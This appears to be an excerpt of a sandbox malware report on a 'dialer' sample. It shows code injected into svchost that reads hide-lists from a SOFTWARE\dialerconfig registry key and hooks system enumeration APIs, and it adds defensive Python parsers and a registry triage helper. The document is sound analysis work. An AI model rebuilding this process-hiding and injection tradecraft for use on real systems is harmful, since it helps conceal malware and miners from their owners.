                                                                      Control-flow graph (rendered as an image in the report): function 0x1408460f0-0x140846318, in the 0x140840000 region whose dump name carries protection 0x40 (PAGE_EXECUTE_READWRITE; the image's 0x140001000 region in this process is also 0x40, whereas in process 64 it was 0x20, PAGE_EXECUTE_READ). It is an import-resolution stub: the loop at 0x140846202 calls LoadLibraryA (0x140846208) per module, each name goes through GetProcAddressForCaller (0x140846241), one outcome of which leads straight to ExitProcess (0x140846258), presumably the failure path, while the other returns to the loop; when the loop ends the block at 0x1408462a2 calls VirtualProtect twice (change and restore page protection) around a call to 0x140846321, runs a short loop at 0x140846311 and returns. Other internal call: 0x1408460b2 from 0x140846189.
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000041.00000002.2571106481.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000041.00000002.2570995936.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2571106481.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000041.00000002.2573934618.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                      • String ID:
                                                                      • API String ID: 1941872368-0
                                                                      • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                      • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                      • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                      • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02
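The graphs in this report are stored on the page as flat token streams: a node id, its address or address range (or a Function_ name in the callgraph), optional `call <addr>` targets, API names with an optional `* N` repeat count, an `N API calls` summary for a collapsed subcall, and `a->b` edges. The parser below is an added example written for this page, not Joe Sandbox code: it turns such a stream into nodes and edges, lists the APIs reachable from a node, and applies the LoadLibrary / GetProcAddress / VirtualProtect check that singles out the import-resolving stub at 0x1408460f0 above. The three input strings are shortened copies of graphs on this page (ids, labels and API names as in the report, intermediate nodes dropped and the edges between the kept nodes stitched directly); the function names, the `Node` layout and the loader heuristic are the example's own.

```python
"""Added example: parser for the flat graph text Joe Sandbox emits for its
control-flow, execution and call graphs. Not Joe Sandbox code."""
import re
from collections import deque
from dataclasses import dataclass, field

# A node label is a hex address, a hex address range, or a Function_ name.
_LABEL = re.compile(r"[0-9a-fA-F]{7,}(?:-[0-9a-fA-F]{7,})?")
_EDGE = re.compile(r"(\d+)->(\d+)")


@dataclass
class Node:
    nid: int
    label: str = ""                               # address, range or Function_ name
    calls: list = field(default_factory=list)     # internal call targets
    apis: list = field(default_factory=list)      # (api name, repeat count)
    subcall_apis: int = 0                         # "N API calls" of a collapsed subcall
    succ: list = field(default_factory=list)      # successor node ids


def _is_label(tok):
    return tok.startswith("Function_") or _LABEL.fullmatch(tok) is not None


def _is_node_id(tok):
    return tok.isdigit() and len(tok) <= 6        # ids are short; addresses have 7+ digits


def parse_graph(text):
    """Return (graph kind, {node id: Node}) for one serialized graph."""
    toks = text.split()
    kind, nodes, cur, i = toks[0], {}, None, 1

    def node(nid):
        return nodes.setdefault(nid, Node(nid))

    while i < len(toks):
        tok, nxt = toks[i], toks[i + 1] if i + 1 < len(toks) else ""
        edge = _EDGE.fullmatch(tok)
        if edge:                                   # "570->571"
            node(int(edge[1])).succ.append(int(edge[2]))
            i += 1
        elif _is_node_id(tok) and _is_label(nxt):  # "570 140001880-14000189c"
            cur = node(int(tok))
            cur.label = nxt
            i += 2
        elif cur is None:
            raise ValueError(f"token {tok!r} before any node")
        elif tok.isdigit() and nxt == "API" and toks[i + 2:i + 3] == ["calls"]:
            cur.subcall_apis = int(tok)            # "16 API calls"
            i += 3
        elif tok == "call" and _is_label(nxt):     # "call 140846321"
            cur.calls.append(nxt)
            i += 2
        elif tok == "*" and nxt.isdigit() and cur.apis:
            name, n = cur.apis[-1]                 # "VirtualProtect * 2"
            cur.apis[-1] = (name, n * int(nxt))
            i += 2
        else:                                      # bare API name
            cur.apis.append((tok, 1))
            i += 1
    return kind, nodes


def reachable_apis(nodes, start):
    """APIs on every node reachable from `start` (BFS over succ edges),
    repeat counts expanded, in discovery order."""
    seen, out, queue = set(), [], deque([start])
    while queue:
        nid = queue.popleft()
        if nid in seen or nid not in nodes:
            continue
        seen.add(nid)
        for name, count in nodes[nid].apis:
            out.extend([name] * count)
        queue.extend(nodes[nid].succ)
    return out


# Load a DLL, resolve a symbol, flip page protection: the three steps a
# self-contained import loader needs. GetProcAddressForCaller is the name the
# report resolved for this sample's stub.
_LOADER_STEPS = (
    {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"},
    {"GetProcAddress", "GetProcAddressForCaller"},
    {"VirtualProtect", "VirtualProtectEx"},
)


def looks_like_loader_stub(nodes, start):
    """True when all three loader steps are reachable from `start`."""
    apis = set(reachable_apis(nodes, start))
    return all(apis & step for step in _LOADER_STEPS)


# Shortened copies of graphs on this page; edges between kept nodes stitched.
CFG_LOADER = ("control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 "
              "30 140846202-140846206 1->30 34 140846208-140846220 LoadLibraryA 30->34 "
              "57 140846241-14084624d GetProcAddressForCaller 34->57 "
              "61 140846258 ExitProcess 57->61 "
              "47 1408462a2-140846302 VirtualProtect * 2 call 140846321 57->47")
EXEC_SVCHOST = ("execution_graph 14720 1fb5399273c 14722 1fb5399276a 14720->14722 "
                "14721 1fb53992858 LoadLibraryA 14721->14722 14722->14721 "
                "14751 1fb539c12bc 16 API calls 14748->14751 14726 1fb539c1ad2 Sleep SleepEx")
CALLGRAPH = ("callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 "
             "2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2")

if __name__ == "__main__":
    kind, nodes = parse_graph(CFG_LOADER)
    print(kind, reachable_apis(nodes, 0), looks_like_loader_stub(nodes, 0))
```

Running it on the full graph lines of a report (copy the whole `control_flow_graph ...` or `execution_graph ...` text into `parse_graph`) gives the API list per function without the rendered image; the loader heuristic is only a triage hint and will also fire on legitimate runtime loaders, so read the reachable API list rather than trusting the boolean alone.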

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      Execution graph (rendered as an image in the report). Two entry points are shown. 0x1fb5399273c -> 0x1fb5399276a loops over LoadLibraryA (0x1fb53992858) until 0x1fb539928d4, the injected module resolving its own imports. 0x1fb539c1abc first calls 0x1fb539c1628, which allocates buffers with GetProcessHeap/HeapAlloc (four calls through 0x1fb539c1268), opens SOFTWARE\dialerconfig with RegOpenKeyExW (0x1fb539c168e) and then, in turn, eight more RegOpenKeyExW calls (0x1fb539c16c0 ... 0x1fb539c1861), one per subkey listed in the string table below (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp); each subkey is enumerated either by 0x1fb539c12bc (RegQueryInfoKeyW, RegEnumValueW, lstrlenW, StrCpyW, HeapAlloc/HeapFree, with every value passed through the StrCmpIW/StrCmpW comparison at 0x1fb539c152c) or by 0x1fb539c104c (RegQueryInfoKeyW, RegEnumValueW, HeapAlloc/HeapFree), and closed with RegCloseKey. After the lists are loaded, 0x1fb539c1acb spins between Sleep/SleepEx (0x1fb539c1ad2) and 0x1fb539c1598 (StrCmpIW, StrCmpW), i.e. the configuration is read from the registry and then polled against string comparisons for as long as the host svchost lives.

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 3bf4cfb0a07fb8a34a3f598bc96345aa7c46004167599278be6342a6ae7bd595
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 4E7138B631AA5686FB109F66E8C16E923A6FB84B88F485521DE4F47B78DF3CC444C344

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 18ea53aa43a98f725242ccc54522eb2a995cd4f0bc6055a6e4289cc5d1fcdbce
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: E111A1F161E24B82F760ABA1F8C53F96397A788344F9C41349A4B817B6EF7DC044C600

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001FB539C1628: GetProcessHeap.KERNEL32 ref: 000001FB539C1633
                                                                        • Part of subcall function 000001FB539C1628: HeapAlloc.KERNEL32 ref: 000001FB539C1642
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16B2
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16DF
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C16F9
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1719
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1734
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1754
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C176F
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C178F
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17AA
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C17CA
                                                                      • Sleep.KERNEL32 ref: 000001FB539C1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001FB539C1ADD
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17E5
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1805
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1820
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1840
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C185B
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C187B
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1896
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 7138facc15c73e94db0cfb52103dedfc80ca7baf7500d53e4cc01c5e64d1c001
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 4C3180F520A64B51FF50AB26DAD13F953A6AB48BD0F0C54319E0B877BAEF2CC451C618
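A triage check for the configuration that the injected svchost code above reads from the registry. This is an added example, not code from the report or from the sample: `parse_reg_export` reads a `reg export` dump of the key offline, `read_live` (Windows only, via winreg, both registry views) reads it from a running host, and `hides_process` models the case-insensitive StrCmpIW match the report shows, which is the example's reading of how the lists are used. The key path and the eight subkey names are the ones in the report's string table; the value names, the constructed .reg sample, the names placed in it and the assumption that the key sits under HKLM are the example's own.

```python
"""Added triage helper for the SOFTWARE\\dialerconfig key read by the injected
svchost code in this report. Not code from the sample or from Joe Sandbox."""
import re

KEY_PATH = r"SOFTWARE\dialerconfig"            # from the report's string table
# Subkey names from the same string table; reading them as lists of items to
# hide is an inference from the hooking signatures in this report.
SUBKEYS = ("paths", "pid", "process_names", "service_names",
           "startup", "tcp_local", "tcp_remote", "udp")

# One REG_SZ line of a .reg file: "name"="value" or @="value".
_SZ_LINE = re.compile(r'(?:"(?:[^"\\]|\\.)*"|@)\s*=\s*"((?:[^"\\]|\\.)*)"')


def _unescape(value):
    """Undo .reg escaping of backslashes and double quotes."""
    return value.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg_export(text):
    """Parse `reg export HKLM\\SOFTWARE\\dialerconfig out.reg` output (version
    5.00) into {subkey: [string values]}. Value names are ignored because the
    sample enumerates values by index (RegEnumValueW); non-string values are
    skipped."""
    config = {k: [] for k in SUBKEYS}
    marker = "\\" + KEY_PATH.lower() + "\\"
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            _head, sep, tail = line[1:-1].lower().partition(marker)
            current = tail if sep and tail in config else None
        elif current is not None:
            m = _SZ_LINE.fullmatch(line)
            if m:
                config[current].append(_unescape(m.group(1)))
    return config


def read_live(hive_name="HKEY_LOCAL_MACHINE"):
    """Windows only: enumerate the key from the live registry in both the
    64-bit and the 32-bit (WOW64) views. HKLM is an assumption; the report
    does not name the hive."""
    import winreg  # ImportError off Windows; the offline parser needs no registry
    hive = getattr(winreg, hive_name)
    config = {k: [] for k in SUBKEYS}
    for view in (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY):
        for sub in SUBKEYS:
            try:
                key = winreg.OpenKey(hive, KEY_PATH + "\\" + sub, 0,
                                     winreg.KEY_READ | view)
            except FileNotFoundError:
                continue
            with key:
                index = 0
                while True:
                    try:
                        _name, data, kind = winreg.EnumValue(key, index)
                    except OSError:            # ERROR_NO_MORE_ITEMS
                        break
                    index += 1
                    if kind == winreg.REG_SZ and data not in config[sub]:
                        config[sub].append(data)
    return config


def key_present(config):
    return any(config[k] for k in SUBKEYS)


def hides_process(config, image_name):
    """Case-insensitive match against process_names, mirroring the StrCmpIW
    comparison the report shows in the injected code (the example's reading)."""
    return any(image_name.lower() == n.lower() for n in config["process_names"])


def summarize(config):
    """One line per non-empty list, for a triage note."""
    return [f"{k}: {', '.join(config[k])}" for k in SUBKEYS if config[k]]


# Constructed sample of what `reg export` would produce; the value names and
# the listed items are made up for the example.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig]

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\process_names]
"0"="xmrig.exe"
"1"="dialer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\paths]
"0"="C:\\ProgramData\\dialer"

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\tcp_remote]
"0"="3333"
"flags"=dword:00000001
"""

if __name__ == "__main__":
    for line in summarize(parse_reg_export(SAMPLE_REG)):
        print(line)
```

On a live host, read the key from a process the hooks are not injected into where possible (for example from an offline copy of the SOFTWARE hive, or after booting clean), because the report shows registry query functions being hooked to hide keys; a `reg export` taken from inside a hooked session may come back empty even though the key exists.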

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered as an image in the report): function 0x1fb5399273c-0x1fb539929d0 in the injected svchost module at 0x1fb53990000. It makes four calls to 0x1fb539929d4, runs a small loop at 0x1fb5399280e, then loops over LoadLibraryA at 0x1fb53992858 (0x1fb539928ca back to 0x1fb53992858) until 0x1fb539928d4; a second loop at 0x1fb5399290d-0x1fb5399298c follows before the return at 0x1fb539929b4. This is the module resolving its own imports after injection, the same LoadLibraryA loop that heads the execution graph above.
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 61dd91bc6a25e48f392e8f6ba260480b8200c95b887252fc9720a6961359b089
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: A661F1B3B0A69987DB548F15D1A07B9B39AF754BA4F1C8131DE9A03798DB38DC52CB00

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered as an image in the report): function 0x1fb539c2b2c-0x1fb539c2f03. It calls 0x1fb539e2ce0, then GetModuleHandleA and GetProcAddress (0x1fb539c2bc9-0x1fb539c2beb) and StrCmpNIW (0x1fb539c2c14); the main body is a loop (0x1fb539c2c60, re-entered from 0x1fb539c2ed2) that per entry calls 0x1fb539c199c, 0x1fb539c1bbc, lstrlenW, 0x1fb539c3844, 0x1fb539c85c0 (up to three times) and 0x1fb539c152c, the StrCmpIW/StrCmpW list comparison from the execution graph above. With the lstrlen / File / Handle / Module / Name / Find / Open / Path / Proc / Process tokens in the API ID below, this is consistent with the routine that checks enumerated entries against the lists loaded from dialerconfig, as the report's file, process and registry hooking signatures describe.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 3ce0a275c11acc5e92f3c7ae4efb9db0a1a550ce48a5a8c3fee84c71d8458c05
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: F1B191B221A69A82EF549F25D4907F9A3A6F748B84F4C5036DE8B677A4DF39CC40C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 489a7c68e5e93f2be97043befc8e533eee2d989b9a1ceb06d858f03c7cbb19f7
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 59311DB620AB858AEB609F61E8907ED7365F784744F48442ADB4E97BA4EF3CC548C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 6fdd1fba7bf15b503d1394c2c4db13ffaa122b827706bd4a70a70ebbee7c2285
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 29319376219F8586EB60CF25E8813EE73A1F789754F580125EA9E43B64DF3CC545CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: e0d383892e9437e16feb1cfbd0bccaab8c6993bef60af1a4249abde3c73bbe4e
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: CF5160B6209B8686EB54CF62E4853AA77A2F789FC9F484534DE8A47728DF3CC045C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 6fe1454f222dbdc956f5aa37bac40278d1ba15de22a72ebfa92ae51e802ad3c4
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 1D314DF410AA4BA0FA04EF66E8D26F4A322AB44348F8C5433948B027769F7C8249D350

                                                                      Control-flow Graph

                                                                      control_flow_graph 197 1fb53996910-1fb53996916 198 1fb53996918-1fb5399691b 197->198 199 1fb53996951-1fb5399695b 197->199 201 1fb53996945-1fb53996984 call 1fb53996fc0 198->201 202 1fb5399691d-1fb53996920 198->202 200 1fb53996a78-1fb53996a8d 199->200 206 1fb53996a9c-1fb53996ab6 call 1fb53996e54 200->206 207 1fb53996a8f 200->207 219 1fb5399698a-1fb5399699f call 1fb53996e54 201->219 220 1fb53996a52 201->220 204 1fb53996938 __scrt_dllmain_crt_thread_attach 202->204 205 1fb53996922-1fb53996925 202->205 208 1fb5399693d-1fb53996944 204->208 210 1fb53996927-1fb53996930 205->210 211 1fb53996931-1fb53996936 call 1fb53996f04 205->211 217 1fb53996ab8-1fb53996aed call 1fb53996f7c call 1fb53996e1c call 1fb53997318 call 1fb53997130 call 1fb53997154 call 1fb53996fac 206->217 218 1fb53996aef-1fb53996b20 call 1fb53997190 206->218 212 1fb53996a91-1fb53996a9b 207->212 211->208 217->212 229 1fb53996b22-1fb53996b28 218->229 230 1fb53996b31-1fb53996b37 218->230 232 1fb539969a5-1fb539969b6 call 1fb53996ec4 219->232 233 1fb53996a6a-1fb53996a77 call 1fb53997190 219->233 223 1fb53996a54-1fb53996a69 220->223 229->230 234 1fb53996b2a-1fb53996b2c 229->234 235 1fb53996b39-1fb53996b43 230->235 236 1fb53996b7e-1fb53996b94 call 1fb5399268c 230->236 250 1fb539969b8-1fb539969dc call 1fb539972dc call 1fb53996e0c call 1fb53996e38 call 1fb5399ac0c 232->250 251 1fb53996a07-1fb53996a11 call 1fb53997130 232->251 233->200 240 1fb53996c1f-1fb53996c2c 234->240 241 1fb53996b45-1fb53996b4d 235->241 242 1fb53996b4f-1fb53996b5d call 1fb539a5780 235->242 258 1fb53996b96-1fb53996b98 236->258 259 1fb53996bcc-1fb53996bce 236->259 247 1fb53996b63-1fb53996b78 call 1fb53996910 241->247 242->247 262 1fb53996c15-1fb53996c1d 242->262 247->236 247->262 250->251 300 1fb539969de-1fb539969e5 __scrt_dllmain_after_initialize_c 250->300 251->220 272 1fb53996a13-1fb53996a1f call 1fb53997180 251->272 258->259 267 1fb53996b9a-1fb53996bbc call 1fb5399268c call 
1fb53996a78 258->267 260 1fb53996bd5-1fb53996bea call 1fb53996910 259->260 261 1fb53996bd0-1fb53996bd3 259->261 260->262 281 1fb53996bec-1fb53996bf6 260->281 261->260 261->262 262->240 267->259 293 1fb53996bbe-1fb53996bc6 call 1fb539a5780 267->293 289 1fb53996a45-1fb53996a50 272->289 290 1fb53996a21-1fb53996a2b call 1fb53997098 272->290 286 1fb53996bf8-1fb53996bff 281->286 287 1fb53996c01-1fb53996c11 call 1fb539a5780 281->287 286->262 287->262 289->223 290->289 299 1fb53996a2d-1fb53996a3b 290->299 293->259 299->289 300->251 301 1fb539969e7-1fb53996a04 call 1fb5399abc8 300->301 301->251
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: f6a05610631161f0791a0f46ca97f481bc5ebb53e9b00542c7e35bf7c6f5f54b
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: A3817EF370F28786FA509B65D4E13F96392A7857A0F5C4135AA47477B6EB3CC8458B00

                                                                      Control-flow Graph

